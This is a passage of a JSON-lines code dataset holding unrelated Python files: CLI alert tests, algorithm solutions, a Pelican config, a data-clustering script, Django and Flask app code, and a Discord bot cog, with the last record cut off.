assert \"Some Burp Rule\" in result.output\n\n\ndef test_show_when_alert_has_note_includes_note(\n cli_state, runner, full_alert_details_response\n):\n cli_state.sdk.alerts.get_details.return_value = full_alert_details_response\n result = runner.invoke(cli, [\"alerts\", \"show\", \"TEST-ALERT-ID\"], obj=cli_state)\n # Note is included in `full_alert_details_response` initially.\n assert \"Note\" in result.output\n assert \"TEST-NOTE-CLI-UNIT-TESTS\" in result.output\n\n\ndef test_show_when_alert_has_no_note_excludes_note(\n mocker, cli_state, runner, full_alert_details_response\n):\n response_data = dict(ALERT_DETAILS_FULL_RESPONSE)\n response_data[\"alerts\"][0][\"note\"] = None\n cli_state.sdk.alerts.get_details.return_value = create_mock_response(\n mocker, data=response_data\n )\n result = runner.invoke(cli, [\"alerts\", \"show\", \"TEST-ALERT-ID\"], obj=cli_state)\n # Note is included in `full_alert_details_response` initially.\n assert \"Note\" not in result.output\n\n\ndef test_show_when_alert_not_found_output_expected_error_message(\n cli_state, runner, custom_error\n):\n cli_state.sdk.alerts.get_details.side_effect = Py42NotFoundError(custom_error)\n result = runner.invoke(cli, [\"alerts\", \"show\", \"TEST-ALERT-ID\"], obj=cli_state)\n assert \"No alert found with ID 'TEST-ALERT-ID'.\" in result.output\n\n\ndef test_show_when_alert_has_observations_and_includes_observations_outputs_observations(\n cli_state, runner, full_alert_details_response\n):\n cli_state.sdk.alerts.get_details.return_value = full_alert_details_response\n result = runner.invoke(\n cli,\n [\"alerts\", \"show\", \"TEST-ALERT-ID\", \"--include-observations\"],\n obj=cli_state,\n )\n assert \"Observations:\" in result.output\n assert \"OBSERVATION\" in result.output\n assert \"f561e556-a746-4db0-b99b-71546adf57c4\" in result.output\n assert \"observedAt\" in result.output\n assert \"FedEndpointExfiltration\" in result.output\n\n\ndef test_show_when_alert_has_observations_and_excludes_observations_does_not_output_observations(\n cli_state, runner, full_alert_details_response\n):\n cli_state.sdk.alerts.get_details.return_value = full_alert_details_response\n result = runner.invoke(cli, [\"alerts\", \"show\", \"TEST-ALERT-ID\"], obj=cli_state)\n assert \"Observations:\" not in result.output\n\n\ndef test_show_when_alert_does_not_have_observations_and_includes_observations_outputs_no_observations(\n mocker, cli_state, runner\n):\n response_data = dict(ALERT_DETAILS_FULL_RESPONSE)\n response_data[\"alerts\"][0][\"observations\"] = None\n cli_state.sdk.alerts.get_details.return_value = create_mock_response(\n mocker, data=response_data\n )\n result = runner.invoke(\n cli,\n [\"alerts\", \"show\", \"TEST-ALERT-ID\", \"--include-observations\"],\n obj=cli_state,\n )\n assert \"No observations found\" in result.output\n assert \"Observations:\" not in result.output\n assert \"FedEndpointExfiltration\" not in result.output\n\n\ndef test_update_when_given_state_calls_py42_update_state(cli_state, runner):\n runner.invoke(\n cli,\n [\"alerts\", \"update\", \"TEST-ALERT-ID\", \"--state\", AlertState.PENDING],\n obj=cli_state,\n )\n cli_state.sdk.alerts.update_state.assert_called_once_with(\n AlertState.PENDING, [\"TEST-ALERT-ID\"], note=None\n )\n\n\ndef test_update_when_given_state_and_note_calls_py42_update_state_and_includes_note(\n cli_state, runner\n):\n runner.invoke(\n cli,\n [\n \"alerts\",\n \"update\",\n \"TEST-ALERT-ID\",\n \"--state\",\n AlertState.PENDING,\n \"--note\",\n \"test-note\",\n ],\n obj=cli_state,\n )\n cli_state.sdk.alerts.update_state.assert_called_once_with(\n AlertState.PENDING, [\"TEST-ALERT-ID\"], note=\"test-note\"\n )\n\n\ndef test_update_when_given_note_and_not_state_calls_py42_update_note(cli_state, runner):\n runner.invoke(\n cli,\n [\"alerts\", \"update\", \"TEST-ALERT-ID\", \"--note\", \"test-note\"],\n obj=cli_state,\n )\n cli_state.sdk.alerts.update_note.assert_called_once_with(\n \"TEST-ALERT-ID\", \"test-note\"\n )\n\n\ndef test_bulk_update_uses_expected_arguments(runner, mocker, cli_state_with_user):\n bulk_processor = mocker.patch(\"code42cli.cmds.alerts.run_bulk_process\")\n with runner.isolated_filesystem():\n with open(\"test_update.csv\", \"w\") as csv:\n csv.writelines(\n [\"id,state,note\\n\", \"1,PENDING,note1\\n\", \"2,IN_PROGRESS,note2\\n\"]\n )\n runner.invoke(\n cli,\n [\"alerts\", \"bulk\", \"update\", \"test_update.csv\"],\n obj=cli_state_with_user,\n )\n assert bulk_processor.call_args[0][1] == [\n {\"id\": \"1\", \"state\": \"PENDING\", \"note\": \"note1\"},\n {\"id\": \"2\", \"state\": \"IN_PROGRESS\", \"note\": \"note2\"},\n ]\n","sub_path":"tests/cmds/test_alerts.py","file_name":"test_alerts.py","file_ext":"py","file_size_in_byte":37730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"495327373","text":"def solve(array, target, index=0, memo={}):\n \"\"\"\n memoized\n \"\"\"\n if target == 0:\n return True\n if target < 0:\n return False\n if index >= len(array):\n return False\n if (index, target) in memo:\n return memo[(index, target)]\n x = solve(array, target, index + 1, memo)\n y = solve(array, target - array[index], index + 1, memo)\n memo[(index, target)] = x or y\n return memo[(index, target)]\n\ndef solve(array, target):\n \"\"\"\n bottom up\n \"\"\"\n dp = [[False for _ in range(target + 1)] for _ in range(len(array) + 1)]\n for i in range(len(array) + 1):\n dp[i][0] = True\n for t in range(1, target + 1):\n for i in range(1, len(array) + 1):\n dp[i][t] = dp[i - 1][t] \n if t - array[i - 1] >= 0:\n dp[i][t] = dp[i][t] or dp[i - 1][t - array[i - 1]]\n return dp[-1][-1]\n","sub_path":"algorithms/subset_sum.py","file_name":"subset_sum.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"597957930","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*- #\nfrom __future__ import unicode_literals\n\nAUTHOR = u'Matt Clark'\nSITENAME = u'mattclarkdotnet'\nSITEURL = 'https://mattclark.net'\n\nTHEME = 'notmyidea'\n\nPATH = 'content'\nSTATIC_PATHS = ['images', 'articles']\n\nTIMEZONE = 'Europe/London'\n\nDEFAULT_LANG = u'en'\n\n# Feed generation is usually not desired when developing\nFEED_ALL_ATOM = None\nCATEGORY_FEED_ATOM = None\nTRANSLATION_FEED_ATOM = None\nAUTHOR_FEED_ATOM = None\nAUTHOR_FEED_RSS = None\n\n# Blogroll\nLINKS = (('Python', 'http://python.org/'),\n ('Clound Foundry', 'http://cloudfoundry.com/'),\n ('Pelican', 'http://blog.getpelican.com/'),\n ('CloudFlare', 'http://cloudflare.com/'),)\n\n# Social widget\nSOCIAL = (('LinkedIn', 'http://www.linkedin.com/in/mattclark04'),\n ('Twitter', 'https://twitter.com/mattclarkdotnet'),\n ('FaceBook', 'http://www.facebook.com/profile.php?id=616541694'),)\n\nTWITTER_USERNAME = 'mattclarkdotnet'\nGITHUB_URL = 'https://github.com/mattclarkdotnet'\n\nDEFAULT_PAGINATION = False\n\n# Uncomment following line if you want document-relative URLs when developing\nRELATIVE_URLS = True\n","sub_path":"pelicanconf.py","file_name":"pelicanconf.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"371951292","text":"from collections import deque\n\ndx, dy = [-1, 1, 0, 0],[0, 0, -1, 1]\n\ndef isNotWall(x, y):\n return (0 <= x < R) and (0 <= y < C)\n\nR, C = map(int,input().split())\nforest = list(input() for _ in range(R))\nwater = [[-1]*C for _ in range(R)]\nvisited = [[-1]*C for _ in range(R)]\nq = deque()\n\n# 초기 위치 저장\nfor x in range(R):\n for y in range(C):\n if forest[x][y] == '*':\n # 물부터,, \n q.append((x, y))\n water[x][y] = 0\n # 고슴도치 출발\n elif forest[x][y] == 'S':\n Sx, Sy = x, y\n # 비버네 집\n elif forest[x][y] == 'D':\n Ex, Ey = x, y\n\n# 물이 퍼지는 것을 체크\nwhile q:\n x, y = q.popleft()\n for n in range(4):\n if isNotWall(x+dx[n], y+dy[n]):\n # 돌도 아니고 비버 집도 아니면\n if forest[x+dx[n]][y+dy[n]] not in 'DX':\n # 방문하지 않았다면\n if water[x+dx[n]][y+dy[n]] == -1:\n water[x+dx[n]][y+dy[n]] = water[x][y] + 1\n q.append((x+dx[n], y+dy[n]))\n\nq.append((Sx, Sy))\nvisited[Sx][Sy] = 0\n\n# 고슴도치 이동을 체크\nwhile q:\n x, y = q.popleft()\n for n in range(4):\n if isNotWall(x+dx[n], y+dy[n]):\n # 돌도 아니고 물도 아니면\n if forest[x+dx[n]][y+dy[n]] not in '*X':\n # 방문하지 않았다면\n if visited[x+dx[n]][y+dy[n]] == -1:\n # 물이 퍼지지 않거나 고슴도치보다 늦게 퍼진다면\n if water[x+dx[n]][y+dy[n]] == -1 or visited[x][y] + 1 < water[x+dx[n]][y+dy[n]]:\n visited[x+dx[n]][y+dy[n]] = visited[x][y] + 1\n q.append((x+dx[n], y+dy[n]))\n \n# 도착했다면\nif visited[Ex][Ey] == -1:\n print('KAKTUS')\nelse:\n print(visited[Ex][Ey])\n\n'''\n와나 시간초과,,, ㅠㅁㅠ\nbfs도전.. => 시간 비교 필요 없어짐, 방문만 체크 필요\n=> bfs까진 필요없을듯..?\n- 물 먼저\n1. queue에 초기값('*') 저장\n2. queue에 값이 있으면 꺼내서 사방 확인(while)\n2-1. 인덱스 확인(isNotWall)\n2-2. XD 있는지 확인\n2-3. 이미 물이 차 있는 곳인지 확인(water)\n3. queue에 조건 만족하는 사방 값 append\n4. 현재 값 +1인 값 저장\nqueue가 빌 때까지,,\n- 다음은 고슴도치\n1. ,,('S')\n2. ,,\n2-2 ,,X*\n2-3 ,,(visited)\n2-4 물이 퍼진 시간이 고슴도치가 이동한 시간보다 크면\n3. ,,\n4. ,,\n,,\nvisited[Ex][Ey]에 방문했으면 그 값을 출력 아니면 KAKTUS\n\n'''","sub_path":"boj_study/3055_boj.py","file_name":"3055_boj.py","file_ext":"py","file_size_in_byte":2562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"615919919","text":"import pandas as pd\nimport numpy as np\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport plotly.plotly as py \nimport plotly.graph_objs as go\n\nfrom itertools import cycle\n\nfrom sklearn import preprocessing\nfrom sklearn import cluster\nfrom sklearn import mixture\n\nfrom sklearn.decomposition import PCA\nfrom sklearn.manifold import TSNE\n\nfrom sklearn.cluster import (MeanShift, MiniBatchKMeans, SpectralClustering, AgglomerativeClustering)\n\n# =====================================================================\n# 1. Download a dataset (using pandas)\n# =====================================================================\n\n# url = \"https://s3.amazonaws.com/happiness-report/2019/Chapter2OnlineData.xls\"\n# df = pd.read_excel(url)\n\ndf = pd.read_excel(r\"C:\\Users\\acikgozs\\Documents\\Chapter2OnlineData.xls\")\n\n\n# =====================================================================\n# 2. Visualize raw data\n# =====================================================================\n\n# ===== Correlation graph =====\ncor = df.corr()\nsns.heatmap(cor,square = True)\n#cor.to_csv(r\"C:\\Users\\acikgozs\\Documents\\test.csv\")\n\n# ===== Plotly World Map =====\ndata = [go.Choropleth(\n locations = df[\"Country name\"], \n locationmode = \"country names\", \n z = df[\"Life Ladder\"], \n text = df[\"Country name\"],\n colorbar = go.choropleth.ColorBar(title = \"Happiness Index\")\n)]\n\nlayout = go.Layout(\n title = go.layout.Title(text = \"Happiness Index 2018\"), \n geo = go.layout.Geo(showframe = False, projection = go.layout.geo.Projection(type = \"equirectangular\"))\n)\n\nchoromap3 = go.Figure(data = data, layout = layout)\npy.iplot(choromap3)\n\n\n# =====================================================================\n# 3. Process data\n# =====================================================================\n\ndf_trans = df.groupby(\"Country name\").transform(lambda x: x.fillna(x.mean()))\ndf_trans.dropna(inplace = True)\n\n\n# =====================================================================\n# 3.a. Dimension reduction\n# =====================================================================\n\nreducer_p = PCA(n_components = 2)\npca_df = reducer_p.fit_transform(df_trans)\n\n# reducer_t = TSNE(n_components = 2)\n# tsne_df = reducer_t.fit_transform(pca_df)\n\n\n# =====================================================================\n# 3.b. Manual Dimension selection\n# =====================================================================\n\nsubdf = df_trans[[\"Life Ladder\", \"Log GDP per capita\", \"Social support\", \"Healthy life expectancy at birth\", \"Freedom to make life choices\", \"Generosity\", \"Perceptions of corruption\", \"Confidence in national government\"]]\nsubdf.fillna(0, inplace = True)\n\nscaler = preprocessing.StandardScaler()\n\nscaled_df = scaler.fit_transform(subdf)\n\nreducer_p = PCA(n_components = 2)\npca_df = reducer_p.fit_transform(scaled_df)\n\n\n# =====================================================================\n# 5. Clustering\n# =====================================================================\n\nlearner = MeanShift(bandwidth = None)\nms = learner.fit_predict(pca_df)\n\nlearner = MiniBatchKMeans(n_clusters = 3)\nmbkm = learner.fit_predict(pca_df)\n\nlearner = SpectralClustering(n_clusters = 3)\nsc = learner.fit_predict(pca_df)\n\nlearner = AgglomerativeClustering(n_clusters = 3)\nac = learner.fit_predict(pca_df)\n\n\n# =====================================================================\n# 5. Cluster graphs\n# =====================================================================\n\n# Meanshift Results\nfig = plt.figure(figsize=(16, 8))\nfig.canvas.set_window_title(\"Clustering data from WHI\")\n\nplt.scatter(pca_df[:, 0], pca_df[:, 1], c = ms.astype(np.float))","sub_path":"Clustering/world_happiness_index.py","file_name":"world_happiness_index.py","file_ext":"py","file_size_in_byte":3660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"360697139","text":"\"\"\"safi URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.9/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url, include\nfrom django.contrib import admin\nimport rest_framework_jwt.views\nimport safi.settings\nimport django.views\n\nurlpatterns = [\n url(r'^accounts/', include('accounts.urls', namespace='accounts')),\n url(r'^endoso/', include('endoso.urls', namespace='endoso')),\n url(r'^custodia/', include('custodia.urls', namespace='custodia')),\n url(r'^causa/', include('causa.urls', namespace='causa')),\n url(r'^admin/', admin.site.urls),\n url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework')),\n url(r'^api-token-auth/', rest_framework_jwt.views.obtain_jwt_token),\n url(r'^api-token-verify/', rest_framework_jwt.views.verify_jwt_token),\n url(r'^api-token-refresh/', rest_framework_jwt.views.refresh_jwt_token),\n url(r'^media/(?P.*)$', django.views.static.serve,{'document_root': safi.settings.MEDIA_ROOT, 'show_indexes': False}),\n]\n\n#url(r'^causa/', include('causa.urls', namespace='causa')),\n","sub_path":"safi/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"366344783","text":"\"\"\"MacPorts URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom django.conf.urls import url\nfrom ports import views\n\nurlpatterns = [\n path('', views.index, name='home'),\n path('statistics/submit/', views.stats_submit, name='stats_submit'),\n path('statistics/ports/', views.stats_port_installations, name='stats_port_installations'),\n path('statistics/ports/filter/', views.stats_port_installations_filter, name='stats_port_installations_filter'),\n path('statistics/faq/', views.stats_faq, name='stats_faq'),\n path('statistics/', views.stats, name='stats_home'),\n url(r'^maintainer/github/(?P[-a-zA-Z0-9_.]+)/$', views.maintainer_detail_github, name='maintainer_detail_github'),\n url(r'^maintainer/email/(?P[-a-zA-Z0-9_.]+)__(?P[-a-zA-Z0-9_.]+)/$', views.maintainer_detail_email, name='maintainer_detail_email'),\n path('port/', include('ports.urls'), name='port-index'),\n path('ports/', views.index, name='ports-index'),\n path('ports/search/', views.search, name='ports_search'),\n path('ports/filter/maintainer/', views.search_ports_in_maintainer, name='search_ports_in_maintainer'),\n path('ports/filter/category/', views.search_ports_in_category, name='search_ports_in_category'),\n path('ports/filter/variant/', views.search_ports_in_variant, name='search_ports_in_variant'),\n path('ports/load_tickets/', views.tickets, name='trac_tickets'),\n path('ports/category//', views.categorylist, name='category_list'),\n url(r'^ports/variant/(?P[a-zA-Z0-9_.]+)/$', views.variantlist, name='variant_list'),\n path('ports/all_builds/filter/', views.all_builds_filter, name='all_builds_filter'),\n path('ports/all_builds/', views.all_builds_view, name='all_builds'),\n path('api/v1/', include('api_v1.urls')),\n path('about/', views.about_page, name='about_page'),\n]\n","sub_path":"app/MacPorts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"282402287","text":"from flask import Flask\nimport sys\nsys.path.append(\"..\")\n# from flask_cors import CORS\nfrom flask import request\n# from flask_ngrok import run_with_ngrok\nfrom src.Modules.prediction import prediction\nfrom src.Modules.recommender import recommendation\nimport logging\n\n\n# CORS(app)\n# run_with_ngrok(app)\napp = Flask(__name__)\n\n\n@app.route('/ml/recommend', methods=['GET'])\n# Main function for recommendation\ndef recommend():\n user_id = request.args.get('userid')\n recommend_model = recommendation(user_id)\n try:\n return recommend_model.recommend_with_existing_model()\n except Exception as err:\n logging.exception(err)\n\n\n@app.route('/ml/predict', methods=['GET'])\ndef predict():\n userid = request.args.get('userid')\n predict_model = prediction(userid)\n try:\n return predict_model.predict()\n except Exception as err:\n logging.exception(err)\n\n@app.route('/')\ndef welcome():\n text=\"Weclome to SmartList API\"\n return text\n\nif __name__ == '__main__':\n app.run(debug=True)\n app.run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"261215259","text":"import math\nimport re\nfrom basic_domain import basic_domain\nclass space_domain(basic_domain):\n\tdef __init__(self):\n\t\tself._domain_type = 'SPACE'\n\n\tdef get_cardinality(self, value_component_len):\n\t\tif value_component_len < 0:\n\t\t\treturn 0\n\t\tif value_component_len == 0:\n\t\t\treturn 1\n\t\treturn math.pow(5, value_component_len)\n\n\n\tdef get_match_result(self, value):\n\t\treg = r'^(\\s+).*$'\n\t\tcompile_reg = re.compile(reg)\n\t\tmatch_result = compile_reg.match(value)\n\t\treturn match_result\n\n\tdef match_domain_success(self, value):\n\t\tmatch_result = self.get_match_result(value)\n\t\tif match_result is None:\n\t\t\treturn False\n\t\telse:\n\t\t\treturn True\n\n\tdef get_value_component(self, value):\n\t\tmatch_result = self.get_match_result(value)\n\t\tif match_result is not None:\n\t\t\tmatch_string = match_result.group(1)\n\t\telse:\n\t\t\tmatch_string = ''\n\t\treturn match_string\n\t\t\n\tdef get_remain_string(self, value):\n\t\tmatch_string = self.get_value_component(value)\n\t\tmatch_string_len = len(match_string)\n\t\tif match_string_len == len(value):\n\t\t\tremain_string = ''\n\t\telif match_string_len < len(value):\n\t\t\tremain_string = value[match_string_len:]\n\t\treturn remain_string\n\n\tdef get_domain_type(self):\n\t\treturn self._domain_type","sub_path":"server/space_domain.py","file_name":"space_domain.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"536968963","text":"import discord, functools\nfrom io import BytesIO\nfrom discord.ext import commands\nfrom cogs.rpgtools import makebg\n\ndef is_patron():\n\tdef predicate(ctx):\n\t\tmember = ctx.bot.get_guild(430017996304678923).get_member(ctx.author.id) # cross server stuff\n\t\tif not member:\n\t\t\treturn False\n\t\treturn discord.utils.get(member.roles, name='Donator') is not None or discord.utils.get(member.roles, name='Administrators') is not None\n\treturn commands.check(predicate)\n\nclass Patreon:\n\n\tdef __init__(self, bot):\n\t\tself.bot = bot\n\n\t@is_patron()\n\t@commands.command(description=\"[Patreon Only] Changes a weapon name.\")\n\tasync def weaponname(self, ctx, itemid: int, *, newname: str):\n\t\tif len(newname)>20:\n\t\t\tawait ctx.send(\"Name too long.\")\n\t\t\treturn\n\t\tasync with self.bot.pool.acquire() as conn:\n\t\t\tasync with conn.cursor() as cur:\n\t\t\t\tawait cur.execute('SELECT * FROM allitems WHERE \"owner\"=%s and \"id\"=%s;', (ctx.author.id, itemid))\n\t\t\t\titem = await cur.fetchone()\n\t\t\t\tif not item:\n\t\t\t\t\tawait ctx.send(f\"You don't own an item with the ID `{itemid}`.\")\n\t\t\t\t\treturn\n\t\t\t\tawait cur.execute('UPDATE allitems SET \"name\"=%s WHERE \"id\"=%s;', (newname, itemid))\n\t\t\t\tawait ctx.send(f\"The item with the ID `{itemid}` is now called `{newname}`.\")\n\n\t@is_patron()\n\t@commands.command(description=\"[Patreon Only] Changes your profile background.\")\n\tasync def background(self, ctx, url: str=None):\n\t\tpremade = [f\"{self.bot.BASE_URL}/profile/premade1.png\", f\"{self.bot.BASE_URL}/profile/premade2.png\", f\"{self.bot.BASE_URL}/profile/premade3.png\", f\"{self.bot.BASE_URL}/profile/premade4.png\"]\n\t\tif not url:\n\t\t\treturn await ctx.send(f\"Please specify either a premade background (`1` to `{len(premade)}`), a custom URL or use `reset` to use the standard image.\")\n\t\telif url == \"reset\":\n\t\t\turl = 0\n\t\telif url.startswith(\"http\") and (url.endswith(\".png\") or url.endswith(\".jpg\") or url.endswith(\".jpeg\")):\n\t\t\turl = url\n\t\telse:\n\t\t\ttry:\n\t\t\t\tif int(url) in range(1, len(premade)+1):\n\t\t\t\t\turl = premade[int(url)-1]\n\t\t\t\telse:\n\t\t\t\t\treturn await ctx.send(\"That is not a valid premade background.\")\n\t\t\texcept:\n\t\t\t\treturn await ctx.send(\"I couldn't read that URL. Does it start with `http://` or `https://` and is either a png or jpeg?\")\n\t\tasync with self.bot.pool.acquire() as conn:\n\t\t\tasync with conn.cursor() as cur:\n\t\t\t\ttry:\n\t\t\t\t\tawait cur.execute('UPDATE profile SET \"background\"=%s WHERE \"user\"=%s;', (url, ctx.author.id,))\n\t\t\t\texcept:\n\t\t\t\t\treturn await ctx.send(\"The URL is too long.\")\n\t\t\t\tif url != 0:\n\t\t\t\t\tawait ctx.send(f\"Your new profile picture is now:\\n{url}\")\n\t\t\t\telse:\n\t\t\t\t\tawait ctx.send(\"Your profile picture has been resetted.\")\n\n\t@is_patron()\n\t@commands.command(description=\"[Patreon Only] Generates a background image.\")\n\tasync def makebackground(self, ctx, url: str, overlaytype: int):\n\t\tif overlaytype not in [1,2]:\n\t\t\treturn await ctx.send(\"User either `1` or `2` as the overlay type.\")\n\t\tif not url.startswith(\"http\") and (url.endswith(\".png\") or url.endswith(\".jpg\") or url.endswith(\".jpeg\")):\n\t\t\treturn await ctx.send(\"I couldn't read that URL. Does it start with `http://` or `https://` and is either a png or jpeg?\")\n\t\t\tasync with self.bot.session.get(url) as r:\n\t\t\t\tbackground = BytesIO(await r.read())\n\t\t\t\tbackground.seek(0)\n\t\tthing = functools.partial(makebg, background, overlaytype)\n\t\toutput_buffer = await self.bot.loop.run_in_executor(None, thing)\n\t\tawait ctx.send(file=discord.File(fp=output_buffer, filename=\"GeneratedProfile.png\"))\n\n\ndef setup(bot):\n\tbot.add_cog(Patreon(bot))\n","sub_path":"cogs/patreon.py","file_name":"patreon.py","file_ext":"py","file_size_in_byte":3471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"42918266","text":"# You are a professional robber planning to rob houses along a street. Each\n# house has a certain amount of money stashed, the only constraint stopping you\n# from robbing each of them is that adjacent houses have security system\n# connected and it will automatically contact the police if two adjacent houses\n# were broken into on the same night.\n\n# Given a list of non-negative integers representing the amount of money of each\n# house, determine the maximum amount of money you can rob tonight without\n# alerting the police.\n\nclass Solution(object):\n def rob(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n n = len(nums)\n if n == 0:\n return 0\n elif n == 1:\n return nums[0]\n max_including = [0] * (n + 1)\n max_including[1] = nums[0]\n max_including[2] = nums[1]\n max_so_far = max(max_including[1], max_including[2])\n for i in xrange(3, n + 1):\n max_including[i] = max(max_including[i - 3],\n max_including[i - 2]) + nums[i - 1]\n max_so_far = max(max_including[i], max_so_far)\n return max_so_far\n","sub_path":"HouseRobber.py","file_name":"HouseRobber.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"262763720","text":"import random\nimport time\n\nimport pandas as pd\nfrom tqdm import tqdm\n\nfrom model import Model\n\n\nEMBEDDING_SIZE = 200\nDENSE_DIM = 12 # Previously was 256\nNUM_FILTERS = 100\nNUM_EPOCHS = 3\nNUM_ITERATIONS = 4\nGROUP_SIZE = 1_600_000\nSAMPLES_PER_GROUP = GROUP_SIZE // 160\nTRAIN_SIZE = SAMPLES_PER_GROUP * 10\n\n\ndef get_sentences(df):\n sentences = []\n for index, row in tqdm(df.iterrows()):\n words = row.text.split()\n target = row.target\n sentences.append((words, target))\n return sentences\n\n\ndef merge_sentences(s1, s2):\n s = []\n for i in range(min(len(s1), len(s2))):\n s.append(s1[i])\n s.append(s2[i])\n return s\n\n\nif __name__ == \"__main__\":\n negative_tweets_path = \"../data/clean_train_negative.csv\"\n positive_tweets_path = \"../data/clean_train_positive.csv\"\n df_negative = pd.read_csv(negative_tweets_path, index_col=0)\n df_positive = pd.read_csv(positive_tweets_path, index_col=0)\n\n print(\"preparing input sentences\")\n all_negative = get_sentences(df_negative)\n all_positive = get_sentences(df_positive)\n all_sentences = merge_sentences(all_negative, all_positive)\n\n # Split into train and test sets\n all_train_sentences = all_sentences[:TRAIN_SIZE]\n print(\"Size of training data:\", len(all_train_sentences))\n test_sentences = all_sentences[-2 * SAMPLES_PER_GROUP:]\n print(\"Size of testing data:\", len(test_sentences))\n\n # Define a model and start learning\n model = Model(\"CNN\", EMBEDDING_SIZE, NUM_FILTERS, [2, 3, 4], DENSE_DIM)\n labeled = random.sample([i for i in range(TRAIN_SIZE)], SAMPLES_PER_GROUP)\n labeled = set(labeled)\n\n start_time = time.time()\n for iteration in range(NUM_ITERATIONS):\n train_sentences = [all_train_sentences[i] for i in labeled]\n print(\"Training with {:4.2f}% of data\".format(100 * len(train_sentences) / len(all_train_sentences)))\n model.reset()\n model.train(train_sentences, test_sentences, NUM_EPOCHS)\n if iteration != NUM_ITERATIONS - 1:\n labeled = model.choose_unlabeled_data_by_clusters_stub(all_train_sentences, labeled, SAMPLES_PER_GROUP)\n # labeled = model.choose_unlabeled_data_random(all_train_sentences, labeled, SAMPLES_PER_GROUP)\n\n print(\"total time:\", time.time() - start_time)\n","sub_path":"scripts/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":2290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"583862914","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 3 22:57:29 2017\n\n@author: hsadeghi\n\"\"\"\n#\nresults={};\nresults['index' ] = 1\nresults['training_error' ]= 2\nresults['test_error' ]= 3\n\n\nresults['input_dim'] = 4\nresults['learning_rate' ] = 5\n \nsave_name = \"/vol/grid-solar/sgeusers/hsadeghi/config_{}_{}.txt\".format(2, 3) \nfile_1 = open(save_name, \"w\") \n\nfor value,key in enumerate(results):\n \n file_1.write( key + ' '+ str(value)+ '\\n')\n\nfile_1.close()\n","sub_path":"May/past_codes/test_file_write.py","file_name":"test_file_write.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"52036737","text":"from flask_restful import Resource, reqparse\nfrom models.recipe import RecipeModel, RecipeSpendAssos\nfrom models.drug import DrugModel, RecipeDrugAssos\nfrom models.patient import UserPatientRecipeAssos\nimport json\nfrom flask_jwt_extended import jwt_required, get_jwt_identity\nfrom db import db\nfrom flask_jwt_extended import jwt_required, get_jwt_identity\nimport math\n\n\nclass Recipe(Resource):\n parser = reqparse.RequestParser()\n parser.add_argument(\n \"title\", type=str, required=True, help=\"this field is required\"\n )\n parser.add_argument(\n \"end_date\", type=str, required=True, help=\"this field is required\"\n )\n parser.add_argument(\n \"notes\", type=str, required=True, help=\"this field is required\"\n )\n # parser.add_argument(\n # \"dept_id\", type=int, required=True, help=\"this field is required\"\n # )\n parser.add_argument(\n \"patient_id\", type=int, required=True, help=\"this field is required\"\n )\n parser.add_argument(\n \"drugs\",\n action='append',\n )\n\n @classmethod\n @jwt_required\n def post(cls):\n data = cls.parser.parse_args()\n drugs = []\n for item in data.drugs:\n x = item.replace(\"'\", '\"')\n var = json.loads(x)\n drug_id = var['drug_id']\n drug = RecipeDrugAssos(drug_id=drug_id, dose=var['dose'], unit=var['unit'], duration=var['duration'],\n rotes=var['rotes'])\n drugs.append(drug)\n\n recipe = RecipeModel(title=data.title, end_date=data.end_date, notes=data.notes,\n drugs=drugs)\n\n recipe.save_to_db()\n current_user_id = get_jwt_identity()\n recipe = recipe.id\n patient = data.patient_id\n user_patient_recipe = UserPatientRecipeAssos(user_id=current_user_id, patient_id=patient, 